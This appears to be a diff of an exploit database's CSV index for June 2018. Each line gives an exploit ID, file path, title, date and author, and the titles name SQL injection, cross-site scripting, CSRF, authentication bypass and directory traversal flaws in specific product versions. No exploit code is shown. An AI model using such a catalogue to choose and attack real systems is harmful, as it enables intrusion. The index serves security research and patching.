-44845,exploits/hardware/webapps/44845.txt,"Canon MF210/MF220 - Authenticaton Bypass",2018-06-06,"Huy Kha",webapps,hardware, 44851,exploits/php/webapps/44851.txt,"WampServer 3.0.6 - Cross-Site Request Forgery",2018-06-07,L0RD,webapps,php, 44853,exploits/php/webapps/44853.txt,"WordPress Form Maker Plugin 1.12.24 - SQL Injection",2018-06-07,defensecode,webapps,php, 44854,exploits/php/webapps/44854.txt,"WordPress Contact Form Maker Plugin 1.12.20 - SQL Injection",2018-06-07,defensecode,webapps,php, @@ -39550,10 +39553,11 @@ id,file,description,date,author,type,platform,port 44882,exploits/php/webapps/44882.txt,"Canon PrintMe EFI - Cross-Site Scripting",2018-06-12,"Huy Kha",webapps,php, 44883,exploits/php/webapps/44883.txt,"WordPress Google Map Plugin < 4.0.4 - SQL Injection",2018-06-12,defensecode,webapps,php, 44884,exploits/php/webapps/44884.txt,"WordPress Ultimate Form Builder Lite Plugin < 1.3.7 - SQL Injection",2018-06-12,defensecode,webapps,php, -44885,exploits/hardware/webapps/44885.txt,"Canon LBP7110Cw - Authentication Bypass",2018-06-12,"Huy Kha",webapps,hardware, -44886,exploits/hardware/webapps/44886.txt,"Canon LBP6030w - Authentication Bypass",2018-06-12,"Huy Kha",webapps,hardware, 44887,exploits/php/webapps/44887.html,"MACCMS 10 - Cross-Site Request Forgery (Add User)",2018-06-13,bay0net,webapps,php, 44891,exploits/php/webapps/44891.txt,"Redaxo CMS Mediapool Addon < 5.5.1 - Arbitrary File Upload",2018-06-13,h0n1gsp3cht,webapps,php, 44893,exploits/php/webapps/44893.php,"Joomla Component Ek rishta 2.10 - SQL Injection",2018-06-14,"Guilherme Assmann",webapps,php, 44895,exploits/php/webapps/44895.txt,"OEcms 3.1 - Cross-Site Scripting",2018-06-15,Renzi,webapps,php, 44897,exploits/php/webapps/44897.txt,"Dimofinf CMS 3.0.0 - Cross-Site Scripting",2018-06-15,Renzi,webapps,php, +44901,exploits/php/webapps/44901.html,"Joomla! Component jomres 9.11.2 - Cross-Site Request Forgery",2018-06-18,L0RD,webapps,php, +44902,exploits/linux/webapps/44902.txt,"RabbitMQ Web Management < 3.7.6 - Cross-Site Request Forgery",2018-06-18,"Dolev Farhi",webapps,linux, +44905,exploits/windows/webapps/44905.txt,"Redatam Web Server < 7 - Directory Traversal",2018-06-18,"Berk Dusunur",webapps,windows,